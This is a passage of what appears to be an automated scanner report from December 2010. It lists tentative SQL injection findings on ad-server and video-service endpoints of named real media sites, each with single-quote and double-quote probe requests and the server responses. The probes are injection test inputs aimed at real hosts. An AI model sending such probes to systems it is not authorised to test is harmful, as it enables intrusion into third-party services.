1.5. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage¶ms.styles=fs&tile=3795625302922&domId=97279 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cartoonnetwork.com
Path:   /html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=97279

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=97279 HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1

Response 1

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:46:02 GMT
Server: Apache
AdServer: ads1ad22:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Sat, 11 Dec 2010 02:46:02 GMT
Pragma: no-cache
Content-Length: 6194
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');

document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.8")))\n');

document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET /html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=97279 HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:46:03 GMT
Server: Apache
AdServer: ads1ad22:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Sat, 11 Dec 2010 02:46:03 GMT
Pragma: no-cache
Content-Length: 3077
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

1.6. http://ads.cnn.com/event.ng/Type=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cnn.com
Path:   /event.ng/Type=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 03:02:46 GMT
Server: Apache
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 02:52:01 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://ads.cnn.com:80/http:/www.cartoonnetwork.com/games/index.html/
Expires: Sat, 11 Dec 2010 02:52:01 GMT
Connection: close
Content-Type: text/html


1.7. http://ads.cnn.com/event.ng/Type=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cnn.com
Path:   /event.ng/Type=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 03:02:46 GMT
Server: Apache
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 03:02:46 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://ads.cnn.com:80/http:/www.cartoonnetwork.com/video/index.html/
Expires: Sat, 11 Dec 2010 03:02:46 GMT
Connection: close
Content-Type: text/html


1.8. http://ads.cnn.com/event.ng/Type=click&FlightID=332166&AdID=477790&TargetID=5468&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Values=47781&Redirect=[ewclickthru] [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cnn.com
Path:   /event.ng/Type=click&FlightID=332166&AdID=477790&TargetID=5468&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Values=47781&Redirect=[ewclickthru]

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=332166&AdID=477790&TargetID=5468&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Values=47781&Redirect=[ewclickthru] HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 03:02:54 GMT
Server: Apache
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=332166&AdID=477790&TargetID=5468&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Values=47781&Redirect=[ewclickthru] HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 03:02:54 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://ads.cnn.com:80/[ewclickthru]
Expires: Sat, 11 Dec 2010 03:02:54 GMT
Connection: close
Content-Type: text/html


1.9. http://ads.cnn.com/event.ng/Type=click&FlightID=347834&AdID=478322&TargetID=79730&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/redacted/click [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cnn.com
Path:   /event.ng/Type=click&FlightID=347834&AdID=478322&TargetID=79730&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/ad.doubleclick.net/click

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=347834&AdID=478322&TargetID=79730&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/ad.doubleclick.net/click HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 03:02:45 GMT
Server: Apache
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=347834&AdID=478322&TargetID=79730&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/ad.doubleclick.net/click HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 03:02:46 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://ads.cnn.com:80/http:/redacted/click
Expires: Sat, 11 Dec 2010 03:02:46 GMT
Connection: close
Content-Type: text/html


1.10. http://ads.tbs.com/event.ng/Type=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.tbs.com
Path:   /event.ng/Type=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ HTTP/1.1
Host: ads.tbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 03:02:57 GMT
Server: Apache
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ HTTP/1.1
Host: ads.tbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 03:02:57 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://ads.tbs.com:80/http:/www.cartoonnetwork.com/games/index.html/
Expires: Sat, 11 Dec 2010 03:02:57 GMT
Connection: close
Content-Type: text/html


1.11. http://ads.tbs.com/event.ng/Type=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.tbs.com
Path:   /event.ng/Type=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ HTTP/1.1
Host: ads.tbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 03:02:59 GMT
Server: Apache
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ HTTP/1.1
Host: ads.tbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 03:02:59 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://ads.tbs.com:80/http:/www.cartoonnetwork.com/video/index.html/
Expires: Sat, 11 Dec 2010 03:02:59 GMT
Connection: close
Content-Type: text/html


1.12. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getAllEpisodes [networkName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getAllEpisodes

Issue detail

The networkName parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the networkName parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getAllEpisodes?networkName=HOME' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:03:50 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getAllEpisodes?networkName=HOME'' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:03:50 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.13. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByCategory [filterByCollectionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getEpisodesByCategory

Issue detail

The filterByCollectionId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the filterByCollectionId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getEpisodesByCategory?id=multiCat&networkName=HOME&filterByCollectionId=' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:04:04 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getEpisodesByCategory?id=multiCat&networkName=HOME&filterByCollectionId='' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:04:04 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 514

<?xml version="1.0" encoding="UTF-8"?>


       <episodes>
       <recentlyAdded recentlyAddedName="Recently Added" totalItems="0">
       
       </recentlyAdded>
       <episodesBySeasons episodesBySeasonsNam
...[SNIP]...

1.14. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByCategory [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getEpisodesByCategory

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getEpisodesByCategory?id=multiCat'&networkName=HOME&filterByCollectionId= HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:03:55 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getEpisodesByCategory?id=multiCat''&networkName=HOME&filterByCollectionId= HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:03:55 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.15. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByCategory [networkName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getEpisodesByCategory

Issue detail

The networkName parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the networkName parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getEpisodesByCategory?networkName=HOME' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:03:54 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getEpisodesByCategory?networkName=HOME'' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:03:54 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.16. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByShow [networkName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
